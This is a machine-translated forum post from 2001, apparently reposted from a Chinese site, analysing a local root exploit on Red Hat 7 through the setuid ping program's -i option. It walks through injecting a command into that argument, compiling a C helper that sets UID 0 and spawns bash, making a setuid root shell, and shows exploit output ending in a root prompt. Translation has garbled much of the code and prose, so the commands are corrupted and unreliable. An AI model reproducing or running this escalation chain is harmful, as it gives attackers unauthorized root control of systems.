This post copyright belongs to the original author, other websites reproduced must be indicated, and traditional media reprints must contact the original author and E Dragon Western Hutan [http://www.xici.net].
Author:
Babo published Date:
2001-02-24 02:00:25
Return to "hacker is also the hero"
Return quickly
redhat7 local use ping to take root vulnerability detailed analysis of: eagle At the outset, I do not publish source code exploits, although the Internet has been, but I do not publish it I will not be held responsible . I know the principle of this vulnerability I believe that everyone can write an attack code, I posted some key code for analysis. The code is not long, you can use shell or perl to write, recommend shell write (the importance of shell is not accumulated). Principle: Maybe it is a major vulnerability of RedHat7. His PING -I parameter allows for using formatted strings to perform any code, everyone knows that the power of the ping program is like this: [Hello! Sune4gle] $ ls -l / bin / ping-rwsr-xr-x 1 root root 20604 AUG 8 2000 / bin / ping has S power, so we have a big article can be done, huh, we can pick one by using ping -i parameters. IP, of course, the parameters in front of IP are the key, that is, our execution command, the s position allows us to run the EUID of PING in the UID of normal privileges, so we actually run the PING. Execute the command with super-supported permissions. This way if we run the following command: [Hello! Sune4gle] $ ping -i '; chmod o w.' 195.117.59 &> / dev / null is written to other users, huh, Of course we You can use the SLEEP statement to make the process waits, use the waiting time we can write a C program, let him compile and run: cat> / xc << _ EOF_MAIN () {setuid (0); setEuid (0); system (" CHMOD 755 /; RM -F / X; RM -F / XC "); Execl (" / bin / bash "," bash "," - i ", 0);} _ EOF_GCC / XC -O / XCHMOD 755 / X Everyone should understand it here? Oh, I created the XC file, and compiled, so that it also has the s power, huh, I will make a setuid Rootshell, haha, good, I put me this shell in redhat7 running test results: First of all, I have to get There is a normal account, 嘿 [Hello! Sune4gle] $ ./getroot.shredhat 7.0 Exploit (c) 2000 suneagle Enjoy Hacking!:) Phase 1: Making / World-Writable ... Phase 2: Compiling helper program in /...phase 3: Chown Chmod on Our Helper Program ... YE! Entering rootshell ... [Hello! root] # iduid = 0 (root) GID = 500 (sune4gle) Groups = 500 ( Sune4gle) [Hello! root] #